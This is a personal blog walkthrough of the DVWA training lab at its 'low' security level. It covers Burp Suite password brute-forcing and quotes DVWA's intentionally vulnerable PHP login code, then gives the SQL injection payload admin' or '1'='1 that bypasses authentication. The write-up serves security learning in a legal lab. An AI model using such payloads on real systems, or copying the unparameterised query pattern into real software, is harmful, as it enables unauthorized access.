DVWA

First Post:

2021-03-21

Last Update:

2024-10-07

Word Count:

577

Read Time:

3 min

DVWA

Env

github: https://github.com/digininja/DVWA

docker install:

1	`docker run --rm -it -p 80:80 vulnerables/web-dvwa`

confiure

After set databases input admin and password to login dvwa

Intro

Damn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goal is to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and to aid both students & teachers to learn about web application security in a controlled class room environment.

The aim of DVWA is to practice some of the most common web vulnerabilities, with various levels of difficultly, with a simple straightforward interface.

Security Level

You can set the security level to low, medium, high or impossible. The security level changes the vulnerability level of DVWA:

Low - This security level is completely vulnerable and has no security measures at all. It’s use is to be as an example of how web application vulnerabilities manifest through bad coding practices and to serve as a platform to teach or learn basic exploitation techniques.
Medium - This setting is mainly to give an example to the user of bad security practices, where the developer has tried but failed to secure an application. It also acts as a challenge to users to refine their exploitation techniques.
High - This option is an extension to the medium difficulty, with a mixture of harder or alternative bad practices to attempt to secure the code. The vulnerability may not allow the same extent of the exploitation, similar in various Capture The Flags (CTFs) competitions.
Impossible - This level should be secure against all vulnerabilities. It is used to compare the vulnerable source code to the secure source code.
Prior to DVWA v1.9, this level was known as ‘high’.

level low

Brute force

Method 1:

crack password

Use Burp Suite to crack the password, Ctrl + i copy package to Intruder mode, click clean $ and reset $ to password parm. add a words to payloads, click start attack. found response length is different from others, maybe this is password.

1	`20 password 200 false false 4704`

Method 2:

sql injection

source code as follows:

<?php

if( isset( $_GET[ 'Login' ] ) ) {
    // Get username
    $user = $_GET[ 'username' ];

    // Get password
    $pass = $_GET[ 'password' ];
    $pass = md5( $pass );

    // Check the database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    if( $result && mysqli_num_rows( $result ) == 1 ) {
        // Get users details
        $row    = mysqli_fetch_assoc( $result );
        $avatar = $row["avatar"];

        // Login successful
        echo "<p>Welcome to the password protected area {$user}</p>";
        echo "<img src=\"{$avatar}\" />";
    }
    else {
        // Login failed
        echo "<pre><br />Username and/or password incorrect.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

We found that this source code has a sql injection vulnerabilities.

So we can choose one of account or password to insert sql then bypass the login authentication.

payload:

set account as:

1	`admin' or '1'='1`

You can set password as any words

打赏点小钱

支付宝 | Alipay

微信 | WeChat

≡